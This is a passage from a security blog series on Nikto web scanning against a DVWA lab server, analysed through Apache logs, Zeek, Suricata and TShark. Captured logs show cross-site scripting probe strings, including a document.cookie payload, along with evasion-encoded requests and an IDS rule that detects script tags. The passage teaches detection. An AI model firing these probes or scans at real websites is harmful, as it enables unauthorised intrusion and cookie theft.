<span style="color: white;">1685727464.659445 CcdKGV3GMXMm4z9kI4 10.0.0.108 47504 10.0.0.106 80 unknown_HTTP_method TRACK F zeek -</span>
<span style="color: white;">1685727464.664164 CcdKGV3GMXMm4z9kI4 10.0.0.108 47504 10.0.0.106 80 HTTP_version_mismatch - F zeek HTTP</span>
<span style="color: white;">1685727464.950085 C4Ed651QVcleVPgo29 10.0.0.108 47520 10.0.0.106 80 unescaped_%_in_URI - F zeek HTTP</span>
<span style="color: white;">1685727465.454423 CmYMGa2Q3SpVd9r26d 10.0.0.108 47532 10.0.0.106 80 unescaped_%_in_URI - F zeek HTTP</span>
<span style="color: white;">1685727465.687074 CvBOhB3P4vU8YucCt6 10.0.0.108 47542 10.0.0.106 80 bad_HTTP_request_with_version - F zeek HTTP</span>
</pre></div>
</div><div><br /></div><div>While the other lines are also interesting and helpful, especially the unknown methods (<i>XULKCYAP</i>, <i>TRACK</i>) and the unescaped <i>%</i> in URIs, the one I will focus on is the last line. It carries the same UID flagged in the <i>analyzer.log</i>, and here Zeek names the problem "<i>bad_HTTP_request_with_version</i>".</div><p>Looking at the last 5 of the unique <i>/dvwa</i> URIs requested over this UID, taken from the <i>http.log</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ grep "CvBOhB3P4vU8YucCt6" http.log | grep --perl-regexp "/dvwa.*.?>" --only-matching | sort --unique | tail --lines=5</span>
<span style="color: white;">/dvwa/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script></span>
<span style="color: white;">/dvwa/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script></span>
<span style="color: white;">/dvwa/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script></span>
<span style="color: white;">/dvwa/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script></span>
<span style="color: white;">/dvwa/XJjRNFyhnLKaf4qbov1ToCeQUomdYA2Vj5S8TQBAEPOiEsXu4umBXddFMlvLzvZm6sPqllgtuX6TeLlDSSwVmLb490LxkJgeX2NnGsvgESafjKPUIHOYLmSAz5NFPDOc1qhQPE8ZSC26h12u9d1a987Zqbik1erQMssHWPByVRRo6zKaA9cp5A7SAijWurFZWxhXOp38ChVSiuQULsVXLS7wZCWWlVZ<font size=50><script>alert(11)</script></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>All of the above shows this was a cross-site scripting attack against a few different parameters. The obvious question is whether it was successful. Everything in the analysis so far suggests it was not; settling it properly means checking whether any response body reflected the payload back unencoded, since the request alone cannot tell you.</p><p>Moving on to see what the IDS saw throughout this attack.</p><p><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></p><p>Set up Suricata to operate in IDS mode. <i>--simulate-ips</i> makes it log drop-action rules as if it were inline while still only sniffing <i>eth0</i>, and <i>-k all</i> forces checksum validation on every packet.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at the alerts that triggered.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 </span>
<span style="color: white;"> 265 1:2009714:8] ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt </span>
<span style="color: white;"> 39 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 19 1:2101201:11] GPL WEB_SERVER 403 Forbidden </span>
<span style="color: white;"> 9 1:2021005:3] ET WEB_SPECIFIC_APPS Vulnerable Magento Adminhtml Access </span>
<span style="color: white;"> 4 1:2019526:5] ET WEB_SERVER WEB-PHP phpinfo access </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above shows the majority of the alerts (265) came from one rule, "<i>1:2009714:8</i>" (generator 1, signature ID 2009714, revision 8). This is what I expected to see, as the activity performed above was cross-site scripting. What is that rule looking for?</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ grep "2009714" /var/lib/suricata/rules/suricata.rules </span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt"; flow:to_server,established; http.uri; content:"</script>"; nocase; reference:url,ha.ckers.org/xss.html; reference:url,doc.emergingthreats.net/2009714; classtype:web-application-attack; sid:2009714; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, former_category WEB_SERVER, signature_severity Major, tag XSS, tag Cross_Site_Scripting, updated_at 2020_08_20;)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
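<p>To make the rule's condition concrete, here is an added Python example, not Suricata code and not from this post, that emulates what sid 2009714 tests: a case-insensitive search for <i>"</script>"</i> in the request URI after percent-decoding, because Suricata's <i>http.uri</i> buffer is the normalized URI (the undecoded one is <i>http.uri.raw</i>). The normalization here is a single percent-decode only; libhtp also does path normalization that this helper skips, and the <i>flow:to_server,established</i> keyword is ignored. The first request line is the one seen in the alert-debug output in this post; the others are constructed variants.</p>

```python
"""Emulate the match condition of ET sid 2009714 on HTTP request lines.

Added example, not Suricata code. The rule's only content match is
content:"</script>"; nocase; on the http.uri buffer, which Suricata fills
with the normalized (percent-decoded, path-normalized) URI. This helper
approximates that normalization with one percent-decode and ignores the
flow keyword, so it shows why encoded and mixed-case tags still fire.
"""
import re
from urllib.parse import unquote

# Request-line shape: METHOD SP request-target SP HTTP-version
REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Za-z]+) (?P<target>\S+) HTTP/(?P<version>\d\.\d)$"
)


def normalized_uri(request_line: str):
    """Return the request-target roughly as the http.uri buffer sees it,
    or None when the line is not a well-formed request line."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return None
    return unquote(m.group("target"))


def sid_2009714_matches(request_line: str) -> bool:
    """content:"</script>"; nocase; on http.uri -> case-insensitive substring test."""
    uri = normalized_uri(request_line)
    return uri is not None and "</script>" in uri.lower()


def count_alerts(request_lines) -> int:
    """How many request lines would raise the alert, i.e. what fast.log
    would accumulate for this sid over the traffic."""
    return sum(1 for line in request_lines if sid_2009714_matches(line))


# Constructed request lines: the first is the one from alert-debug.log in this
# post, the rest are variants chosen to show what the match does and does not cover.
SAMPLE_REQUESTS = [
    "GET /%20HTTP/1.1%0d%0aAccept%3a%20szQrZvVofmGWM/../../dvwa/themes/mambosimple.php"
    "?detection=detected&sitename=</title><script>alert(document.cookie)</script> HTTP/1.1",
    # percent-encoded tag: still matches after decoding, because http.uri is normalized
    "GET /dvwa/webtools/bonsai/showcheckins.cgi?person=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1",
    # mixed case: matches because of nocase
    "GET /dvwa/index.php?q=<SCRIPT>alert(1)</ScRiPt> HTTP/1.1",
    # opening tag only, no closing tag: the rule does not fire
    "GET /dvwa/index.php?q=<script>alert(1) HTTP/1.1",
    # benign request
    "GET /dvwa/ HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(sid_2009714_matches(line), line[:70])
    print("alerts:", count_alerts(SAMPLE_REQUESTS))
```

<p>The fourth sample is the practical caveat: a payload that never closes its script tag, or injects an event handler instead of a tag, is outside what this one signature covers, which is why it is one of several XSS rules in the ET set rather than the only one.</p>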
<p></p><p>The rule is basically looking for <i>"</script>"</i> in the URI: a single <i>content</i> match with <i>nocase</i> on the <i>http.uri</i> buffer, which in Suricata is the normalized (percent-decoded) URI, so an encoded <i>%3C/script%3E</i> fires it just the same. It only considers client-to-server traffic in an established flow (<i>flow:to_server,established</i>). Looking into the packet where <i>"</script>"</i> was seen in the URI.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span><span><span style="color: white;">
</span><span style="color: white;">└─$ less alert-debug.log </span><span style="color: white;">
</span><span style="color: white;">...</span><span style="color: white;">
</span><span style="color: white;">ALERT CNT: 1</span><span style="color: white;">
</span><span style="color: white;">ALERT MSG [00]: ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt</span><span style="color: white;">
</span><span style="color: white;">ALERT GID [00]: 1</span><span style="color: white;">
</span><span style="color: white;">ALERT SID [00]: 2009714</span><span style="color: white;">
</span><span style="color: white;">ALERT REV [00]: 8</span><span style="color: white;">
</span><span style="color: white;">ALERT CLASS [00]: Web Application Attack</span><span style="color: white;">
</span><span style="color: white;">ALERT PRIO [00]: 1</span><span style="color: white;">
</span><span style="color: white;">ALERT FOUND IN [00]: STATE</span><span style="color: white;">
</span><span style="color: white;">ALERT IN TX [00]: 27</span><span style="color: white;">
</span><span style="color: white;">PAYLOAD LEN: 341</span><span style="color: white;">
</span><span style="color: white;">PAYLOAD:</span><span style="color: white;">
</span><span style="color: white;"> 0000 47 45 54 20 2F 25 32 30 48 54 54 50 2F 31 2E 31 </span><span style="color: white; font-weight: bold;">GET</span><span style="color: white;"> </span><span style="color: white;">/%20</span><span style="color: white;"> </span><span style="color: white; font-weight: bold;">HTTP</span><span style="color: white;">/</span><span style="color: white; font-weight: bold;">1.1</span><span style="color: white;">
</span><span style="color: white;">0010 25 30 64 25 30 61 41 63 63 65 70 74 25 33 61 25 %0d%0aAc cept%3a%</span><span style="color: white;">
</span><span style="color: white;">0020 32 30 73 7A 51 72 5A 76 56 6F 66 6D 47 57 4D 2F 20szQrZv VofmGWM/</span><span style="color: white;">
</span><span style="color: white;">0030 2E 2E 2F 2E 2E 2F 64 76 77 61 2F 74 68 65 6D 65 ../../dv wa/theme</span><span style="color: white;">
</span><span style="color: white;">0040 73 2F 6D 61 6D 62 6F 73 69 6D 70 6C 65 2E 70 68 s/mambos imple.ph</span><span style="color: white;">
</span><span style="color: white;">0050 70 3F 64 65 74 65 63 74 69 6F 6E 3D 64 65 74 65 p?detect ion=dete</span><span style="color: white;">
</span><span style="color: white;">0060 63 74 65 64 26 73 69 74 65 6E 61 6D 65 3D 3C 2F cted&sit ename=</</span><span style="color: white;">
</span><span style="color: white;">0070 74 69 74 6C 65 3E 3C 73 63 72 69 70 74 3E 61 6C title><s cript>al</span><span style="color: white;">
</span><span style="color: white;">0080 65 72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F ert(docu ment.coo</span><span style="color: white;">
</span><span><span style="color: white;">0090 6B 69 65 29 3C 2F 73 63 72 69 70 74 3E 20 48 54 kie)</span><span style="color: #fcff01;"></sc ript></span><span style="color: white;"> HT</span></span><span style="color: white;">
</span><span style="color: white;">00A0 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E 65 63 74 69 TP/1.1.. Connecti</span><span style="color: white;">
</span><span style="color: white;">00B0 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep -Alive..</span><span style="color: white;">
</span><span style="color: white;">00C0 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span><span style="color: white;">
</span><span style="color: white;">00D0 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span><span style="color: white;">
</span><span style="color: white;">00E0 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B NT 10.0 ; Win64;</span><span style="color: white;">
</span><span style="color: white;">00F0 20 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 x64) Ap pleWebKi</span><span style="color: white;">
</span><span style="color: white;">0100 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C t/537.36 (KHTML,</span><span style="color: white;">
</span><span style="color: white;">0110 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Ge cko) Chr</span><span style="color: white;">
</span><span style="color: white;">0120 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 ome/74.0 .3729.16</span><span style="color: white;">
</span><span style="color: white;">0130 39 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 9 Safari /537.36.</span><span style="color: white;">
</span><span style="color: white;">0140 0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 30 .Host: 1 0.0.0.10</span><span style="color: white;">
</span><span style="color: white;">0150 36 0D 0A 0D 0A 6....</span><span style="color: white;">
</span><span style="color: white;">...</span></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above shows the packet and what the rule matched on.</p><p>Nothing else interesting for me to focus on at this time.</p><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div>Nik Alleyne, MSc | CISSP | 
GC|IA|IH|REM|PEN (http://www.blogger.com/profile/10282323977269843041)

Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./) (published 2023-12-12T18:24:00-08:00, updated 2023-12-12T18:45:49-08:00)<p>This post is part of a series on learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and processes used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br />Other posts in this series:<br /><br /></p><p><b><span style="font-size: medium;">Hack - Leveraging the information disclosure with evasion technique Directory self-reference (/./)</span></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 3 -evasion 2</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Directory self-reference (/./)</span>
<span style="color: white;">+ Start Time: 2023-05-31 15:46:03 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%2e/ - Redirects (302) to http://10.0.0.106/dashboard/ , Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.</span>
<span style="color: white;">+ /?sql_debug=1 - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.</span>
<span style="color: white;">+ /index.php?sql_debug=1 - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.</span>
<span style="color: white;">...</span>
<span style="color: white;">/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// - Redirects (302) to http://10.0.0.106/dashboard/ , Abyss 1.03 reveals directory listing when multiple /'s are requested.</span>
<span style="color: white;">...</span>
<span style="color: white;">+ End Time: 2023-05-31 15:46:19 (GMT-4) (16 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>One caveat on the findings above: the Weblogic, PHP-Nuke and Abyss entries are all driven by the same <i>302</i> redirect to <i>/dashboard/</i>. Nikto reports a database entry whenever the probed path did not come back as a 404; it does not verify that the product it names is actually present, so these need confirming before they are called vulnerabilities.</p><p><b><span style="font-size: medium;">Detect - Log Analysis</span></b></p><p>Looking at the first 5 lines of the <i>access.log</i> file.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ head access.log --lines=5</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi.cgi/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./webcgi/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi-914/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div><p></p><p>As always, looking at the HTTP methods. Why so much emphasis on the HTTP methods? Well, this is an HTTP-based attack, isn't it?!</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 2 --delimiter '"' | cut -f 1 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 1743 GET</span>
<span style="color: white;"> 5 POST</span>
<span style="color: white;"> 3 OPTIONS</span>
<span style="color: white;"> 2 TRACK</span>
<span style="color: white;"> 1 TRACE</span>
<span style="color: white;"> 1 PUT</span>
<span style="color: white;"> 1 PROPFIND</span>
<span style="color: white;"> 1 INDEX</span>
<span style="color: white;"> 1 GSHJQSVC</span>
<span style="color: white;"> 1 get</span>
<span style="color: white;"> 1 DEBUG</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>In the interest of time, let's focus on the response codes:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 3 --delimiter '"' | cut -f 2 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 1665 404</span>
<span style="color: white;"> 48 302</span>
<span style="color: white;"> 24 403</span>
<span style="color: white;"> 10 400</span>
<span style="color: white;"> 6 503</span>
<span style="color: white;"> 3 200</span>
<span style="color: white;"> 1 HTTP/1.1</span>
<span style="color: white;"> 1 417</span>
<span style="color: white;"> 1 405</span>
<span style="color: white;"> 1 >\\\</span>
</pre></div>
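<p>The two pipelines above work until a request contains a double quote, which Apache logs escaped as <i>\"</i>; <i>cut</i> still splits on it, and the <i>HTTP/1.1</i> and <i>>\\\</i> "status codes" in the output are the result. The following is an added Python example, not code from this post: it parses combined-format lines with a regex that accepts backslash-escaped characters inside the quoted fields, tallies methods and status codes the same way, and flags methods a normal client would not send. The first four sample lines are from the <i>access.log</i> shown above; the last two are constructed, including the assumed <i>501</i> for the random method probe.</p>

```python
"""Tally methods and status codes from Apache combined-format access logs.

Added example, not from the post. Apache writes a double quote that appears
in the request as \\", so splitting on '"' shifts the fields for such lines;
the regex below accepts backslash-escaped characters inside each quoted field.
"""
import re
from collections import Counter

# Combined log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"$'
)

# Methods a normal client or WebDAV tool would send; anything else is worth a look.
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE",
                 "CONNECT", "PATCH", "PROPFIND"}


def parse_line(line):
    """Return one access.log line as a dict, or None when it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    row = m.groupdict()
    parts = row["request"].split(" ")
    row["method"] = parts[0]
    has_version = len(parts) > 1 and parts[-1].startswith("HTTP/")
    row["version"] = parts[-1] if has_version else ""
    row["target"] = " ".join(parts[1:-1] if has_version else parts[1:])
    return row


def parse_access_log(text):
    """Parse every non-empty line, dropping the ones that do not match."""
    rows = (parse_line(line) for line in text.splitlines() if line.strip())
    return [r for r in rows if r is not None]


def count_by(rows, key):
    """Same tally as 'cut ... | sort | uniq --count', keyed on a parsed field."""
    return Counter(r[key] for r in rows)


def unusual_methods(rows):
    """Methods outside KNOWN_METHODS; case-sensitive on purpose, 'get' is as odd as 'GSHJQSVC'."""
    return sorted({r["method"] for r in rows if r["method"] not in KNOWN_METHODS})


def naive_status(line):
    """What the quote-delimited cut pipeline yields for one line (field 3 on '"',
    then field 2 on space); kept only to show how an escaped quote shifts fields."""
    return line.split('"')[2].split(" ")[1]


UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
# Sample log: the first four lines are from the access.log in this post, the
# last two are constructed (the 501 for the random method is assumed).
SAMPLE_LOG = "\n".join([
    f'10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "{UA}"',
    f'10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi.cgi/./ HTTP/1.1" 404 297 "-" "{UA}"',
    f'10.0.0.108 - - [31/May/2023:15:45:45 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "{UA}"',
    f'10.0.0.108 - - [31/May/2023:15:45:45 -0400] "TRACE /./ HTTP/1.0" 200 194 "-" "{UA}"',
    f'10.0.0.108 - - [31/May/2023:15:45:45 -0400] "GSHJQSVC /./ HTTP/1.1" 501 - "-" "{UA}"',
    f'10.0.0.108 - - [31/May/2023:15:45:46 -0400] "GET /./index.php?q=\\"><script>alert(1)</script> HTTP/1.1" 404 297 "-" "{UA}"',
])

if __name__ == "__main__":
    rows = parse_access_log(SAMPLE_LOG)
    print(count_by(rows, "method").most_common())
    print(count_by(rows, "status").most_common())
    print("unusual methods:", unusual_methods(rows))
```

<p>On the last sample line <i>naive_status</i> returns <i>HTTP/1.1</i>, which is exactly the stray entry in the pipeline output, while the regex parser reads the real <i>404</i>.</p>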
</div><div><br /></div><div><div>The <i>HTTP/1.1</i> and <i>>\\\</i> entries are not status codes; they come from requests that carry a double quote, which Apache logs as <i>\"</i> and which throws the quote-delimited <i>cut</i> off by a field. Focusing only on the 3 <i>200</i> codes:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp '\s+200\s+'</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:45 -0400] "GET /./favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:45 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:15:45:45 -0400] "TRACE /./ HTTP/1.0" 200 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
</div><div><br /></div><div>Nothing pressing above. Transitioning to packet analysis.</div><p><span style="font-size: medium;"><b>Detect - Packet Analysis</b></span></p><p>Looking at the packets where the response code is <i>200</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]</span>
<span style="color: white;">└─$ tshark -n -r tuning_3.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 4</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 8</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 9</span>
</pre></div>
